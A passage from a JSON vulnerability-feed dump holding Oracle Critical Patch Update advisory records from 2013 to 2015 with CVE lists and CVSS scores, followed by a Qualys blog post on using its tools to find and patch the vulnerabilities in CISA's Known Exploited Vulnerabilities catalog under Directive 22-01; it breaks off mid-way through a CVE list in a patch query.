Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.** Starting Oct 2013, the Java SE Critical Patch Update will be released quarterly every year as per the main Oracle Critical Patch Update Schedule. This Critical Patch Update contains 127 new security fixes (including 51 Java fixes) across the product families listed below.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n", "cvss3": {}, "published": "2013-10-15T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update - October 2013", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-3792", "CVE-2012-2750", "CVE-2013-2248", "CVE-2013-5856", "CVE-2013-5848", "CVE-2013-5782", "CVE-2013-5846", "CVE-2013-5818", "CVE-2013-3839", "CVE-2013-5779", "CVE-2013-5807", "CVE-2013-4002", "CVE-2013-3831", "CVE-2013-5850", "CVE-2013-3840", "CVE-2013-5778", "CVE-2013-3827", "CVE-2013-3833", "CVE-2013-5867", "CVE-2013-0169", "CVE-2013-3828", "CVE-2013-3785", "CVE-2013-5862", "CVE-2013-5762", "CVE-2013-3766", "CVE-2013-2172", "CVE-2013-5776", "CVE-2013-5827", "CVE-2013-5788", "CVE-2013-5765", "CVE-2013-5773", "CVE-2013-3841", "CVE-2013-5842", "CVE-2013-2251", "CVE-2013-3836", "CVE-2013-5836", "CVE-2013-5810", "CVE-2013-3762", "CVE-2013-5830", "CVE-2013-5859", "CVE-2013-5832", "CVE-2013-5864", "CVE-2013-5841", "CVE-2013-5845", "CVE-2013-5813", "CVE-2013-3814", "CVE-2013-5763", "CVE-2013-5839", "CVE-2013-5784", "CVE-2013-5792", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-3838", "CVE-2013-5771", "CVE-2011-3389", "CVE-2013-5787", "CVE-2013-3835", "CVE-2013-5852", "CVE-2013-3834", "CVE-2013-5828", "CVE-2013-5854", "CVE-2013-5768", "CVE-2013-5806", "CVE-2013-0149", "CVE-2013-5805", "CVE-2013-5826", "CVE-2013-5857", "CVE-2013-5825", "CVE-2013-5811", "CVE-2013-5789", "CVE-2013-5822", "CVE-2013-5823", "CVE-2013-5837", "CVE-2013-2461", "CVE-2013-5843", "CVE-2013-5812", "CVE-2013-5849", "CVE-2013-5769", "CVE-2013-5865", "CVE-2013-5780", "CVE-2013-3842", "CVE-2013-3624", "CVE-2013-5761", "CVE-2013-5791", "CVE-2013-5816", "CVE-2013-5824", "CVE-2013-5831", "CVE-2013-5847", "CVE-2013-2134", "CVE-2013-5799", "CVE-2013-5814", "CVE-2013-5798", "CVE-2013-5766", "CVE-2013-5775", "CVE-2013-5863", "CVE-2013-2135", "CVE-2013-5829", "CVE-2013-5786", "CVE-2013-5803", "CVE-2013-5844", "CVE-2013-5796", "CVE-2013-5861", "CVE-2013-5781", "CVE-2013-5835", "CVE-2013-3826", "CVE-2013-5819", "CVE-2013-5770", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5767", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-3832", "CVE-2013-5793", "CVE-2013-5777", "CVE-2013-5790", "CVE-2013-3837", "CVE-2013-5838", "CVE-2013-5794", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5866", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772", "CVE-2013-5815"], "modified": "2015-02-24T00:00:00", "id": "ORACLE:CPUOCT2013-1899837", "href": "https://www.oracle.com/security-alerts/cpuoct2013.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-08T18:59:32", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.** This Critical Patch Update contains 144 new security fixes across the product families listed below.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n", "cvss3": {}, "published": "2014-01-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update - January 2014", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0371", "CVE-2012-3544", "CVE-2014-0400", "CVE-2013-5879", "CVE-2013-5876", "CVE-2013-5889", "CVE-2013-2248", "CVE-2013-5909", "CVE-2007-0008", "CVE-2014-0392", "CVE-2013-5873", "CVE-2013-5858", "CVE-2014-0405", "CVE-2013-5860", "CVE-2014-0367", "CVE-2014-0385", "CVE-2013-5878", "CVE-2006-0999", "CVE-2014-0410", "CVE-2012-4558", "CVE-2014-0398", "CVE-2013-5897", "CVE-2013-2071", "CVE-2014-0404", "CVE-2014-0415", "CVE-2014-0434", "CVE-2013-5884", "CVE-2014-0435", "CVE-2014-0443", "CVE-2013-5870", "CVE-2014-0390", "CVE-2013-5905", "CVE-2013-5880", "CVE-2013-5904", "CVE-2014-0391", "CVE-2013-5888", "CVE-2013-5893", "CVE-2014-0387", "CVE-2013-2251", "CVE-2014-0393", "CVE-2014-0399", "CVE-2012-4605", "CVE-2013-5821", "CVE-2014-0431", "CVE-2013-5898", "CVE-2014-0427", "CVE-2014-0441", "CVE-2013-5900", "CVE-2013-1654", "CVE-2014-0433", "CVE-2014-0375", "CVE-2013-5886", "CVE-2014-0401", "CVE-2014-0396", "CVE-2014-0406", "CVE-2013-5872", "CVE-2014-0440", "CVE-2014-0425", "CVE-2013-5883", "CVE-2013-1862", "CVE-2013-5834", "CVE-2014-0418", "CVE-2014-0373", "CVE-2013-5877", "CVE-2013-5874", "CVE-2014-0439", "CVE-2014-0394", "CVE-2013-5887", "CVE-2014-0408", "CVE-2014-0376", "CVE-2014-0422", "CVE-2014-0419", "CVE-2014-0411", "CVE-2014-0369", "CVE-2014-0366", "CVE-2013-5882", "CVE-2013-5895", "CVE-2003-1067", "CVE-2014-0437", "CVE-2013-5885", "CVE-2013-5901", "CVE-2013-5881", "CVE-2013-2067", "CVE-2014-0389", "CVE-2014-0388", "CVE-2013-5899", "CVE-2014-0412", "CVE-2013-5896", "CVE-2013-3830", "CVE-2014-0417", "CVE-2014-0372", "CVE-2014-0407", "CVE-2013-5910", "CVE-2013-5906", "CVE-2014-0428", "CVE-2013-5891", "CVE-2014-0382", "CVE-2014-0370", "CVE-2013-5808", "CVE-2006-0998", "CVE-2013-2134", "CVE-2013-5871", "CVE-2014-0402", "CVE-2013-2924", "CVE-2013-4310", "CVE-2014-0368", "CVE-2014-0420", "CVE-2013-5853", "CVE-2014-0423", "CVE-2013-2135", "CVE-2013-5868", "CVE-2014-0430", "CVE-2014-0374", "CVE-2013-5875", "CVE-2013-5869", "CVE-2013-5907", "CVE-2014-0377", "CVE-2012-3499", "CVE-2013-5902", "CVE-2013-5894", "CVE-2013-5795", "CVE-2007-0009", "CVE-2013-5892", "CVE-2014-0381", "CVE-2014-0383", "CVE-2014-0424", "CVE-2014-0395", "CVE-2013-4316", "CVE-2014-0379", "CVE-2014-0403", "CVE-2013-5908", "CVE-2014-0386", "CVE-2007-1858", "CVE-2013-5785", "CVE-2014-0445", "CVE-2013-5764", "CVE-2014-0444", "CVE-2014-0378", "CVE-2013-5833", "CVE-2013-1620", "CVE-2013-5890", "CVE-2014-0416", "CVE-2014-0380", "CVE-2014-0438"], "modified": "2014-01-14T00:00:00", "id": "ORACLE:CPUJAN2014-1972949", "href": "https://www.oracle.com/security-alerts/cpujan2014.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-08T18:53:03", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n \n\n\n**Oracle continues to periodically receive reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\n \n\n\nThis Critical Patch Update contains 193 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n \n\n\n** Please note that on May 15, 2015, Oracle released [Security Alert for CVE-2015-3456 (QEMU \"Venom\")](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-3456-2542656.html>). Customers of affected Oracle products are strongly advised to apply the fixes and/or configuration steps that were announced for CVE-2015-3456. **\n\n \n\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n\n \n\n", "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update - July 2015", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-1926", "CVE-2015-1802", "CVE-2015-4000", "CVE-2015-2591", "CVE-2015-0443", "CVE-2015-1803", "CVE-2015-4771", "CVE-2015-2627", "CVE-2015-2615", "CVE-2014-3566", "CVE-2015-4764", "CVE-2015-4774", "CVE-2015-2601", "CVE-2015-4738", "CVE-2014-8098", "CVE-2015-0235", "CVE-2015-4729", "CVE-2015-1804", "CVE-2015-4751", "CVE-2015-0444", "CVE-2015-0445", "CVE-2015-4749", "CVE-2014-8092", "CVE-2015-4758", "CVE-2014-7809", "CVE-2015-2643", "CVE-2015-4770", "CVE-2015-4747", "CVE-2015-2661", "CVE-2015-4778", "CVE-2015-2632", "CVE-2015-2625", "CVE-2015-2617", "CVE-2015-4784", "CVE-2015-2664", "CVE-2015-2605", "CVE-2015-2597", "CVE-2015-4785", "CVE-2015-4732", "CVE-2015-2653", "CVE-2014-3572", "CVE-2014-3613", "CVE-2015-0206", "CVE-2014-0227", "CVE-2015-2595", "CVE-2015-4782", "CVE-2015-0286", "CVE-2015-3244", "CVE-2015-2648", "CVE-2015-2657", "CVE-2014-0230", "CVE-2014-8100", "CVE-2015-4789", "CVE-2015-2581", "CVE-2015-2613", "CVE-2015-2658", "CVE-2014-3571", "CVE-2015-4736", "CVE-2015-2599", "CVE-2013-2251", "CVE-2013-5704", "CVE-2015-4739", "CVE-2015-0288", "CVE-2015-4790", "CVE-2013-6422", "CVE-2015-2589", "CVE-2010-1324", "CVE-2015-2623", "CVE-2015-2631", "CVE-2010-4020", "CVE-2015-2596", "CVE-2015-4763", "CVE-2015-0285", "CVE-2015-4783", "CVE-2015-2620", "CVE-2015-2650", "CVE-2011-3389", "CVE-2015-2654", "CVE-2015-0207", "CVE-2015-2607", "CVE-2015-2639", "CVE-2015-2611", "CVE-2015-2645", "CVE-2015-2634", "CVE-2015-2594", "CVE-2014-8275", "CVE-2015-3456", "CVE-2015-0467", "CVE-2015-2584", "CVE-2015-0208", "CVE-2015-2808", "CVE-2013-0249", "CVE-2014-3570", "CVE-2015-2590", "CVE-2015-2656", "CVE-2015-2626", "CVE-2015-2628", "CVE-2015-4768", "CVE-2015-4761", "CVE-2015-4745", "CVE-2015-4750", "CVE-2014-0139", "CVE-2015-2635", "CVE-2015-4756", "CVE-2015-2647", "CVE-2014-3707", "CVE-2015-0293", "CVE-2015-2600", "CVE-2015-2580", "CVE-2014-8097", "CVE-2014-8101", "CVE-2015-2640", "CVE-2015-4733", "CVE-2015-2646", "CVE-2014-1568", "CVE-2015-2651", "CVE-2015-2603", "CVE-2014-8091", "CVE-2015-4765", "CVE-2015-2660", "CVE-2015-2604", "CVE-2015-0255", "CVE-2015-4772", "CVE-2015-2662", "CVE-2015-4735", "CVE-2015-0468", "CVE-2015-4779", "CVE-2015-0209", "CVE-2015-2585", "CVE-2013-2186", "CVE-2014-3567", "CVE-2015-2614", "CVE-2014-0015", "CVE-2015-4737", "CVE-2015-4776", "CVE-2015-4757", "CVE-2015-4728", "CVE-2015-2637", "CVE-2015-2606", "CVE-2015-4769", "CVE-2015-0204", "CVE-2015-2621", "CVE-2015-4786", "CVE-2015-4787", "CVE-2015-2638", "CVE-2015-4740", "CVE-2015-2619", "CVE-2015-4731", "CVE-2014-8095", "CVE-2015-4727", "CVE-2015-4741", "CVE-2015-2636", "CVE-2015-2659", "CVE-2015-2655", "CVE-2015-4775", "CVE-2015-4773", "CVE-2014-8102", "CVE-2015-0291", "CVE-2015-4746", "CVE-2015-2629", "CVE-2014-8096", "CVE-2015-4788", "CVE-2015-4755", "CVE-2015-2602", "CVE-2015-4748", "CVE-2015-0287", "CVE-2015-2622", "CVE-2015-2610", "CVE-2012-0036", "CVE-2013-2174", "CVE-2015-2663", "CVE-2015-4742", "CVE-2014-8093", "CVE-2015-0289", "CVE-2015-2652", "CVE-2015-4759", "CVE-2015-0446", "CVE-2015-0292", "CVE-2015-2582", "CVE-2015-4780", "CVE-2014-1569", "CVE-2015-4781", "CVE-2015-2618", "CVE-2015-2641", "CVE-2015-2593", "CVE-2015-4744", "CVE-2015-2598", "CVE-2014-0138", "CVE-2015-2587", "CVE-2015-2630", "CVE-2015-2592", "CVE-2015-4767", "CVE-2015-0290", "CVE-2015-2616", "CVE-2015-0205", "CVE-2015-2624", "CVE-2015-2609", "CVE-2015-4777", "CVE-2010-1323", "CVE-2015-1787", "CVE-2015-4754", "CVE-2014-3569", "CVE-2015-2588", "CVE-2015-4760", "CVE-2015-2583", "CVE-2015-4743", "CVE-2013-4545", "CVE-2015-4752", "CVE-2015-2586", "CVE-2015-4753", "CVE-2015-2649", "CVE-2015-2612", "CVE-2015-2644"], "modified": "2016-07-07T00:00:00", "id": "ORACLE:CPUJUL2015-2367936", "href": "https://www.oracle.com/security-alerts/cpujul2015.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-04T21:16:01", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to: Critical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 193 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ https://blogs.oracle.com/security](<https://blogs.oracle.com/security/>).\n\n**Please note that on May 15, 2015, Oracle released Security Alert for CVE-2015-3456 (QEMU \"Venom\") .Customers of affected Oracle products are strongly advised to apply the fixes and/or configuration steps that were announced for CVE-2015-3456.**\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: https://www.oracle.com/security-alerts/cpufaq.html#CVRF.\n", "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - July 2015", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-1323", "CVE-2010-1324", "CVE-2010-4020", "CVE-2011-3389", "CVE-2012-0036", "CVE-2013-0249", "CVE-2013-2174", "CVE-2013-2186", "CVE-2013-2251", "CVE-2013-4545", "CVE-2013-5704", "CVE-2013-6422", "CVE-2014-0015", "CVE-2014-0138", "CVE-2014-0139", "CVE-2014-0227", "CVE-2014-0230", "CVE-2014-1568", "CVE-2014-1569", "CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3569", "CVE-2014-3570", "CVE-2014-3571", "CVE-2014-3572", "CVE-2014-3613", "CVE-2014-3707", "CVE-2014-7809", "CVE-2014-8091", "CVE-2014-8092", "CVE-2014-8093", "CVE-2014-8095", "CVE-2014-8096", "CVE-2014-8097", "CVE-2014-8098", "CVE-2014-8100", "CVE-2014-8101", "CVE-2014-8102", "CVE-2014-8275", "CVE-2015-0204", "CVE-2015-0205", "CVE-2015-0206", "CVE-2015-0207", "CVE-2015-0208", "CVE-2015-0209", "CVE-2015-0235", "CVE-2015-0255", "CVE-2015-0285", "CVE-2015-0286", "CVE-2015-0287", "CVE-2015-0288", "CVE-2015-0289", "CVE-2015-0290", "CVE-2015-0291", "CVE-2015-0292", "CVE-2015-0293", "CVE-2015-0443", "CVE-2015-0444", "CVE-2015-0445", "CVE-2015-0446", "CVE-2015-0467", "CVE-2015-0468", "CVE-2015-1787", "CVE-2015-1802", "CVE-2015-1803", "CVE-2015-1804", "CVE-2015-1926", "CVE-2015-2580", "CVE-2015-2581", "CVE-2015-2582", "CVE-2015-2583", "CVE-2015-2584", "CVE-2015-2585", "CVE-2015-2586", "CVE-2015-2587", "CVE-2015-2588", "CVE-2015-2589", "CVE-2015-2590", "CVE-2015-2591", "CVE-2015-2592", "CVE-2015-2593", "CVE-2015-2594", "CVE-2015-2595", "CVE-2015-2596", "CVE-2015-2597", "CVE-2015-2598", "CVE-2015-2599", "CVE-2015-2600", "CVE-2015-2601", "CVE-2015-2602", "CVE-2015-2603", "CVE-2015-2604", "CVE-2015-2605", "CVE-2015-2606", "CVE-2015-2607", "CVE-2015-2609", "CVE-2015-2610", "CVE-2015-2611", "CVE-2015-2612", "CVE-2015-2613", "CVE-2015-2614", "CVE-2015-2615", "CVE-2015-2616", "CVE-2015-2617", "CVE-2015-2618", "CVE-2015-2619", "CVE-2015-2620", "CVE-2015-2621", "CVE-2015-2622", "CVE-2015-2623", "CVE-2015-2624", "CVE-2015-2625", "CVE-2015-2626", "CVE-2015-2627", "CVE-2015-2628", "CVE-2015-2629", "CVE-2015-2630", "CVE-2015-2631", "CVE-2015-2632", "CVE-2015-2634", "CVE-2015-2635", "CVE-2015-2636", "CVE-2015-2637", "CVE-2015-2638", "CVE-2015-2639", "CVE-2015-2640", "CVE-2015-2641", "CVE-2015-2643", "CVE-2015-2644", "CVE-2015-2645", "CVE-2015-2646", "CVE-2015-2647", "CVE-2015-2648", "CVE-2015-2649", "CVE-2015-2650", "CVE-2015-2651", "CVE-2015-2652", "CVE-2015-2653", "CVE-2015-2654", "CVE-2015-2655", "CVE-2015-2656", "CVE-2015-2657", "CVE-2015-2658", "CVE-2015-2659", "CVE-2015-2660", "CVE-2015-2661", "CVE-2015-2662", "CVE-2015-2663", "CVE-2015-2664", "CVE-2015-2808", "CVE-2015-3244", "CVE-2015-3456", "CVE-2015-4000", "CVE-2015-4727", "CVE-2015-4728", "CVE-2015-4729", "CVE-2015-4731", "CVE-2015-4732", "CVE-2015-4733", "CVE-2015-4735", "CVE-2015-4736", "CVE-2015-4737", "CVE-2015-4738", "CVE-2015-4739", "CVE-2015-4740", "CVE-2015-4741", "CVE-2015-4742", "CVE-2015-4743", "CVE-2015-4744", "CVE-2015-4745", "CVE-2015-4746", "CVE-2015-4747", "CVE-2015-4748", "CVE-2015-4749", "CVE-2015-4750", "CVE-2015-4751", "CVE-2015-4752", "CVE-2015-4753", "CVE-2015-4754", "CVE-2015-4755", "CVE-2015-4756", "CVE-2015-4757", "CVE-2015-4758", "CVE-2015-4759", "CVE-2015-4760", "CVE-2015-4761", "CVE-2015-4763", "CVE-2015-4764", "CVE-2015-4765", "CVE-2015-4767", "CVE-2015-4768", "CVE-2015-4769", "CVE-2015-4770", "CVE-2015-4771", "CVE-2015-4772", "CVE-2015-4773", "CVE-2015-4774", "CVE-2015-4775", "CVE-2015-4776", "CVE-2015-4777", "CVE-2015-4778", "CVE-2015-4779", "CVE-2015-4780", "CVE-2015-4781", "CVE-2015-4782", "CVE-2015-4783", "CVE-2015-4784", "CVE-2015-4785", "CVE-2015-4786", "CVE-2015-4787", "CVE-2015-4788", "CVE-2015-4789", "CVE-2015-4790"], "modified": "2016-07-07T00:00:00", "id": "ORACLE:CPUJUL2015", "href": "https://www.oracle.com/security-alerts/cpujul2015.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,